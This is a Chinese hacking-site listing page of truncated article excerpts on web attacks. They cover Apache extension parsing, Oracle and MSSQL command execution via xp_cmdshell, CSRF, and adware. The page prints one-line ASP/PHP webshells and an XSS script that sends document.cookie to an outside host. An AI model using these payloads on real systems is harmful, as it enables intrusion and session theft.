小编 防止apache的php扩展名解析漏洞
主要问题是:不管文件最后后缀为什么,只要是.php.*结尾,就会被Apache服务器解析成php文件,问题是apache如果在mime.types文件里面没有定义的扩展名在诸如x1.x2.x3的情况下,最后一个x3的没有定义,他会给解析成倒数第二个的x...
也想出现在这里?
联系我们吧
秒杀Google浏览器
用Google浏览器浏览此篇文章,并点击下面的字符: EVIL:% 是不是很爽,^_^。
正则表达式的基本语法
正则表达式的基本语法 首先让我们看两个特殊的符号\’^\’和\’$\’。他们的作用是分别指出一个字符串的开始和结束。例子如下: "^The":表示所有以"The...
犀利的 oracle 注入技术
犀利的 oracle 注入技术 原文发表在黑客手册 linx 2008.1.12 介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。 以下的演示都是在web上的sql plus执行的,在web注入时 把selec...
一句话木马(asp,php) 总结篇
asp一句话 <%execute(request("1"))%> php一句话 <?php eval($_POST[1]);?> aspx一句话 <script language="C#&qu...
CSRF—攻击与防御
0x01 什么是CSRF攻击 CSRF是Cross Site Request Forgery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做,你可以把...
mssql的sa权限执行命令方法总结
测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动) 一.xp_cmdshell EXEC master..xp_cmdshell ‘ipconfig’ 开启xp_c...
弹窗口的流氓软件核心代码
ps:请勿用于非法用途,仅供技术研究之用。 by:yunshu 这个东西的主要功能就是去网上一个URL读取配置文件,拿到需要弹出的窗口以及周期时间,然后开始弹……程序安装成服务,并设置为自动启动。启动之后写入一段代码到exp...
asp php XSS获取cookie的代码
<script>document.write(\'<img src="http://url/news.asp?msg=\’+document.cookie+\’" width=0 heigh...
用U盘就可黑进有密码的Windows系统
【赛迪网-IT技术报道】U盘 如今可以说非常普及了,不过,如果只是把它用来存储数据的话,也许有点可惜了。其实,我们还可以让U盘发挥更大的能量!今天小编教你一招,能让你的U盘代 替登录系统的密码,只有当你插上U盘才能正常进入系统操作,否则任何操作都无法进...
